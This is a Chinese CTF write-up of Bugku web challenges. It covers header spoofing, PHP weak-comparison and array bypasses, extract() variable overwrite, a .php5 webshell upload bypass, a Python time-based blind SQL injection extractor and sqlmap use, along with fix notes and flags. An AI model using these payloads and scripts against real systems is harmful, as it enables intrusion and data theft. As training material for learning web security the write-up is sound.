你从哪里来
http://123.206.87.240:9009/from.php
在请求头中加上 Referer: https://www.google.com 即可,注意必须是 https(我之前用 http 怎么也出不来 flag),推测服务端连协议部分也一起比对了。顺带一提:Referer 完全由客户端控制,任何基于它的"来源校验"都不能当作访问控制。
flag{bug-ku_ai_admin}
md5 collision(NUPT_CTF)
http://123.206.87.240:9009/md5.php
题名虽叫 md5 collision,考的其实是 PHP 的弱类型比较:md5('s878926199a') = 0e545993274517709034328855841020,这种以 "0e" 开头、后面全是数字的串在 == 比较时会被当成科学计数法的 0,与其他 "0e…" 形式的 md5 值相等。传入 http://123.206.87.240:9009/md5.php?a=s878926199a 即得 flag。修复方式是用 === 或 hash_equals() 做比较。
flag{md5_collision_is_easy}
程序员本地网站
http://123.206.87.240:8002/localhost/
请从本地访问
在请求头中加上 X-Forwarded-For: 127.0.0.1 就得到 flag 了。根因是服务端拿客户端可以随意伪造的 X-Forwarded-For 当作来源 IP 做"仅本地可访问"的判断;正确做法是只信任 REMOTE_ADDR,或只在经过可信反向代理时才解析该头。
flag{loc-al-h-o-st1}
各种绕过
各种绕过哟
http://123.206.87.240:8002/web7/
代码审计题,代码如下:
<?php
// Challenge source (web7). The flag is printed only when all three checks below pass.
highlight_file('flag.php');
// Decodes the (already decoded) query value a second time; irrelevant for the plain value 'margin'.
$_GET['id'] = urldecode($_GET['id']);
$flag = 'flag{xxxxxxxxxxxxxxxxxx}';
if (isset($_GET['uname']) and isset($_POST['passwd'])) {
    // Loose comparison: the two raw inputs must differ ...
    if ($_GET['uname'] == $_POST['passwd'])
        print 'passwd can not be uname.';
    // ... but their sha1() digests must be strictly identical. Sending arrays (uname[]=&passwd[]=1)
    // makes sha1() return NULL with a warning on PHP < 8 (PHP 8 throws TypeError instead), so
    // NULL === NULL holds while the arrays themselves are not loosely equal.
    // NOTE: `&` is bitwise AND, not `&&`; `===` binds tighter, so this is (digests equal) & (id == 'margin').
    else if (sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin'))
        die('Flag: '.$flag);
    else
        print 'sorry!';
}
?>
考点在 sha1($_GET['uname']) === sha1($_POST['passwd']):传入的两个参数不能相等(==),但 sha1() 后的值需要全等(===)。绕过方法是把两个参数都传成数组(uname[]=、passwd[]=1):PHP 8 之前 sha1() 收到数组只会报 warning 并返回 NULL(很多 writeup 写成 false),NULL === NULL 成立;而两个数组本身元素不同,所以 == 不成立。注意 PHP 8 起 sha1() 收到数组会直接抛 TypeError,此法失效。另外条件里的 & 是按位与而非 &&,但因为 === 优先级更高,效果上仍相当于同时要求 id=margin。解题脚本如下:
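# -*- coding:utf-8 -*-
"""web7 solver: bypass ``sha1($_GET['uname']) === sha1($_POST['passwd'])`` with arrays.

``uname[]=`` and ``passwd[]=1`` are two different arrays, so the server's loose
``==`` check fails as required, while ``sha1()`` on an array returns NULL on
PHP < 8 (PHP 8 raises TypeError instead), turning the strict comparison into
NULL === NULL. ``id=margin`` satisfies the remaining condition.
"""
import requests

URL = 'http://123.206.87.240:8002/web7/'


def solve(url=URL, timeout=10):
    """Send the array payload and return the response body, which carries the flag.

    Args:
        url: base URL of the challenge page.
        timeout: per-request timeout in seconds so an unreachable host cannot hang the script.

    Returns:
        The response text exactly as returned by the server.
    """
    # The array parameters go on the query string verbatim; PHP turns `uname[]` into an array.
    response = requests.post(url + '?uname[]=&id=margin', data={'passwd[]': '1'}, timeout=timeout)
    return response.text


if __name__ == '__main__':
    print(solve())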
flag{HACK_45hhs_213sDD}
web8
txt????
http://123.206.87.240:8002/web8/
<?php
// Challenge source (web8). extract() turns every GET parameter into a PHP variable, so the
// client controls $ac and $fn and can also overwrite any variable defined before this point.
extract($_GET);
if (!empty($ac)) {
    // $fn is attacker-chosen: file_get_contents() accepts stream wrappers such as php://input,
    // so the request's own POST body becomes $f and can trivially be made equal to $ac.
    $f = trim(file_get_contents($fn));
    if ($ac === $f) {
        echo "<p>This is flag:" ." $flag</p>";
    } else {
        echo "<p>sorry!</p>";
    }
}
?>
变量覆盖漏洞:extract($_GET) 把所有 GET 参数直接变成 PHP 变量,于是 $fn 可以被指向 php://input,file_get_contents() 读到的就是我们自己的 POST 体;再让 ac 与 POST 体相同(都为 1)即可通过 $ac === $f。(extract() 作用于用户输入时,此前定义的任何变量都可能被覆盖。)解题脚本如下:
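# -*- coding:utf-8 -*-
"""web8 solver: variable overwrite through extract($_GET).

``fn=php://input`` makes the server's ``file_get_contents($fn)`` read our own
POST body, so sending body ``1`` together with ``ac=1`` satisfies ``$ac === $f``
(``$f`` is trim()med, so a trailing newline in the body would not matter).
"""
import requests

URL = 'http://123.206.87.240:8002/web8/'


def solve(url=URL, token='1', timeout=10):
    """POST `token` as the raw body while pointing the server's `fn` at php://input.

    Args:
        url: base URL of the challenge page.
        token: value used both as `ac` and as the POST body; must be non-empty
            because the server guards on `!empty($ac)`.
        timeout: per-request timeout in seconds so an unreachable host cannot hang the script.

    Returns:
        The response text, which contains the flag on success.
    """
    response = requests.post(url, params={'ac': token, 'fn': 'php://input'}, data=token, timeout=timeout)
    return response.text


if __name__ == '__main__':
    print(solve())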
flag{3cfb7a90fc0de31}
细心
地址:http://123.206.87.240:8002/web13/
想办法变成admin
首页显示404,扫描一下目录,有robots.txt文件,访问resusl.php,提示要输入密码,随便输入测试一下,最后输入admin得到flag
flag(ctf_0098_lkji-s)
求getshell
求getshell
http://123.206.87.240:8002/web9/
文件上传绕过:用 Burp Suite 拦截请求,先改 header 中 Content-Type 的大小写(Multipart/form-data),说明服务端对这个字段做的是大小写敏感的字符串匹配;再把文件后缀依次改成 php2、php3、php4、php5、phps、pht、phtm、phtml 逐个测试,最终 php5 成功,推测是后缀黑名单漏掉了它而 Web 服务器又把 .php5 交给 PHP 解析。防御上应当用后缀白名单、忽略客户端给的 Content-Type,并把上传文件存到 Web 根目录之外。
POST /web9/index.php HTTP/1.1
Host: 123.206.87.240:8002
Content-Length: 426
Cache-Control: max-age=0
Origin: http://123.206.87.240:8002
Upgrade-Insecure-Requests: 1
Content-Type: Multipart/form-data; boundary=----WebKitFormBoundaryFIpHkQ8rB2zpCR8U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://123.206.87.240:8002/web9/
Accept-Language: zh-CN,zh;q=0.9,und;q=0.8
Connection: close

------WebKitFormBoundaryFIpHkQ8rB2zpCR8U
Content-Disposition: form-data; name="file"; filename="QQ截图20190817094816.php5"
Content-Type: image/png

PNG webshell
------WebKitFormBoundaryFIpHkQ8rB2zpCR8U
Content-Disposition: form-data; name="submit"

Submit
------WebKitFormBoundaryFIpHkQ8rB2zpCR8U--
KEY{bb35dc123820e}
INSERT INTO注入
题目:
地址:http://123.206.87.240:8002/web15/
flag格式:flag{xxxxxxxxxxxx}
不如写个Python吧
error_reporting(0);
// Returns the client IP, preferring the X-Forwarded-For header when present.
// The header is attacker-controlled and is never validated or escaped before use below.
function getIp(){
    $ip = '';
    if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
        $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    }else{
        $ip = $_SERVER['REMOTE_ADDR'];
    }
    // Only the first comma-separated element survives, so an injection payload must not contain commas.
    $ip_arr = explode(',', $ip);
    return $ip_arr[0];
}
$host="localhost"; $user=""; $pass=""; $db="";
// Legacy mysql_* API: no prepared statements, no escaping anywhere in this snippet.
$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");
mysql_select_db($db) or die("Unable to select database");
$ip = getIp();
// The header value is also echoed back without escaping.
echo 'your ip is :'.$ip;
// $ip is concatenated straight into the INSERT: a single quote in X-Forwarded-For breaks out of the
// string literal. Query results are never shown, hence the time-based (sleep) blind injection below.
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);
解答:
题目提供了源码:X-Forwarded-For 的值未经任何转义就被拼进 insert into client_ip (ip) values ('$ip'),但页面不会回显查询结果,所以只能靠 sleep() 做时间盲注。注意逗号并不是被"过滤",而是 getIp() 里 explode(',', $ip) 只取第一段,逗号之后的内容都会被丢掉,因此 payload 必须完全不含逗号:用 substr(x from n for 1) 代替 substr(x, n, 1),用 case when 代替 if(a, b, c)。下面脚本依次注出库名、表名、列名和 flag(前三步已注释掉):
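# -*- coding:utf-8 -*-
"""web15 solver: time-based blind SQL injection through the X-Forwarded-For header.

The server inserts the first comma-separated element of X-Forwarded-For into
``insert into client_ip (ip) values ('<ip>')`` without escaping, so a value
starting with a quote breaks out of the string literal. Nothing is echoed back,
hence the ``case when ... then sleep(DELAY) else 0 end`` timing oracle.
Because getIp() splits on ',', every payload is written comma-free:
``substr(x from n for 1)`` instead of ``substr(x, n, 1)`` and CASE instead of
``if(a, b, c)``.
"""
import requests

URL = 'http://123.206.87.240:8002/web15/'
# Candidate characters. Only ord(char) is injected, so quotes and the backslash in here are harmless.
CHARSET = '''1234567890~`!@#$%^&*()-_=+[]{};:'"|\\,<.>/?qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'''
# Seconds the oracle sleeps on a hit.
DELAY = 3

# The four extraction stages the original script ran one after another (commenting
# the finished ones out). Each is a comma-free expression yielding the string to recover.
QUERIES = {
    'database': 'database()',
    'tables': '(select group_concat(table_name) from information_schema.tables where table_schema=database())',
    'columns': "(select group_concat(column_name) from information_schema.columns where table_name='flag')",
    'flag': '(select flag from flag)',
}


def build_payload(query, position, char_code, delay=DELAY):
    """Return the X-Forwarded-For value that sleeps iff character `position` (1-based) of `query` equals `char_code`.

    The leading quote closes the server's string literal, `+` keeps the INSERT value
    a valid expression, and `#` comments out the rest of the statement.
    """
    return ("1'+(select case when (ascii(substr(%s from %d for 1))=%d) then sleep(%d) else 0 end))#"
            % (query, position, char_code, delay))


def extract(query, url=URL, max_len=30, delay=DELAY, charset=CHARSET, timeout=None):
    """Recover the value of `query` one character at a time via the timing oracle.

    Args:
        query: comma-free SQL expression (see QUERIES) whose string value is wanted.
        url: challenge URL that runs the vulnerable INSERT.
        max_len: upper bound on the number of characters to recover.
        delay: sleep() duration used by the oracle; a response slower than this counts as a hit.
        charset: candidate characters tried at each position, in order.
        timeout: socket timeout; must exceed `delay` or a hit looks like a miss.
            Defaults to delay + 7.

    Returns:
        The recovered string. Extraction stops at the first position where no
        candidate triggers the delay (end of the value, or a character outside `charset`).
    """
    if timeout is None:
        timeout = delay + 7
    recovered = ''
    for position in range(1, max_len + 1):
        for char in charset:
            headers = {'X-Forwarded-For': build_payload(query, position, ord(char), delay)}
            elapsed = requests.get(url, headers=headers, timeout=timeout).elapsed.total_seconds()
            # The original required 3 <= t < 4; a slow link can push a real hit past the
            # upper bound and silently drop the character, so only the lower bound is kept.
            if elapsed >= delay:
                recovered += char
                print('position %d of %s: %s' % (position, query, char))
                break
        else:
            # No candidate matched at this position: the value is exhausted.
            break
    return recovered


if __name__ == '__main__':
    # Run the stage you need; the original script commented the earlier stages out once known.
    print('flag:', extract(QUERIES['flag']))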
flag{cdbf14c9551d5be5612f7bb5d2867853}
这是一个神奇的登陆框
题目:
http://123.206.87.240:9001/sql/
flag格式flag{}
解题:
打开就是一个登录页面,用 Burp 抓下登录请求保存成文件,交给 sqlmap(sqlmap -r request.txt)跑,直接能跑出注入点。注意请求里还有一个客户端可控的 Cookie isadmin=false,也值得一并测试。
POST /sql/ HTTP/1.1
Host: 123.206.87.240:9001
Content-Length: 52
Cache-Control: max-age=0
Origin: http://123.206.87.240:9001
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://123.206.87.240:9001/sql/
Accept-Language: zh-CN,zh;q=0.9,und;q=0.8
Cookie: isadmin=false
Connection: close

admin_name=admin&admin_passwd=123456&submit=GO+GO+GO
flag{ed6b28e684817d9efcaf802979e57aea}